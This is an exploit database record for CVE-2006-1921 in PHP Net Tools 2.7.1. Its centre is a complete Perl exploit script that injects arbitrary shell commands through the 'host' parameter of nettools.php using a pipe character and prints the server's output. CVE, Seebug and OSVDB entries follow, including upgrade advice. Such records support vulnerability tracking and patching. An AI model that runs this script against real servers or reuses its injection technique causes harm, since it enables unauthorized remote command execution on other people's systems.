PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:1695", "cvelist": ["CVE-2006-1921"], "modified": "2006-04-18T00:00:00", "lastseen": "2016-01-31T14:41:40", "edition": 1, "sourceData": "#!/usr/bin/perl\n# PHP Net Tools Remote Code Execution Exploit\n#\n# by FOX_MULDER (fox_mulder@abv.bg)\n# Vulnerability found by FOX_MULDER.\n#\n# \"Born to be root !!!\"\n#----------------------------------+\n#PHP Net Tools |\n#Copyright (C) 2005 Eric Robertson |\n#h4rdc0d3@gmail.com |\n#----------------------------------+\n#\n# Fact:Wbyte counted twice to infinity !!!\n#\n#\n###################################################\n\tuse LWP 5.64;\n\n\tmy $hostname = $ARGV[0];\n\tmy $dir = $ARGV[1];\n\tmy $command = $ARGV[2];\n\n if (@ARGV<2) {\n\tprint \"\\nUsage: ntools.pl www.site.com /dir/ \\\"ls \\-la\\\" \\n\";\n\texit();\n\t}\n\t\n\tprint \"=======================================================\\n\";\n\tprint \"0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\\n\";\n\tprint \"PHP Net Tools Command Execution Exploit by FOX_MULDER\\n\";\n\tprint \"fox_mulder@abv.bg\\r\\n\";\n\tprint \"=======================================================\\n\";\n\n\tmy $browser = LWP::UserAgent->new;\n\t$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');\n\tprint \"\\n\\n[+]Sending request to server . . .\\r\\n\";\n\t\n\tmy $url = \"http://$hostname$dir/nettools.php\";\n\n\t\n\tmy $response = $browser->post( $url,[\n\t\t'ping' => '1',\n \t'host' => \"|$command\"]);\n\n \tmy $code = $response->status_line;\n print \"[+] HTTP RESPONSE $code\\n\";\n print \"\\n[+]Injecting command . . .\\n\";\n\t$response->content =~ /blockquote>(.*)<\\/blockquote>/s;\n\tprint \"$1\\n\";\n\n# milw0rm.com [2006-04-18]\n", "published": "2006-04-18T00:00:00", "href": "https://www.exploit-db.com/exploits/1695/", "osvdbidlist": ["24783"], "reporter": "FOX_MULDER", "hash": "503941ba01903f61547dd3d26533e94253d0ef3981fdb1ed664e00758d576369", "title": "PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1695/"}

{"result": {"cve": [{"id": "CVE-2006-1921", "type": "cve", "title": "CVE-2006-1921", "description": "nettools.php in PHP Net Tools 2.7.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter.", "published": "2006-04-20T14:06:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1921", "cvelist": ["CVE-2006-1921"], "lastseen": "2016-09-03T06:48:57"}], "seebug": [{"id": "SSV-63481", "type": "seebug", "title": "PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit", "description": "Summary: \nPHP Net Tools 2.7.1 of nettools. php allows a remote attacker by means of the host parameter in the shell metacharacters to execute arbitrary commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.seebug.org/vuldb/ssvid-63481", "cvelist": ["CVE-2006-1921"], "lastseen": "2016-07-30T23:32:57"}], "osvdb": [{"id": "OSVDB:24783", "type": "osvdb", "title": "PHP Net Tools nettools.php host Variable Arbitrary Command Execution", "description": "## Solution Description\nUpgrade to version 2.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.hotscripts.com/Detailed/47915.html\n[Secunia Advisory ID:19694](https://secuniaresearch.flexerasoftware.com/advisories/19694/)\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000840.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000839.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1695\n[CVE-2006-1921](https://vulners.com/cve/CVE-2006-1921)\n", "published": "2006-04-18T08:32:35", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:24783", "cvelist": ["CVE-2006-1921"], "lastseen": "2017-04-28T13:20:21"}]}}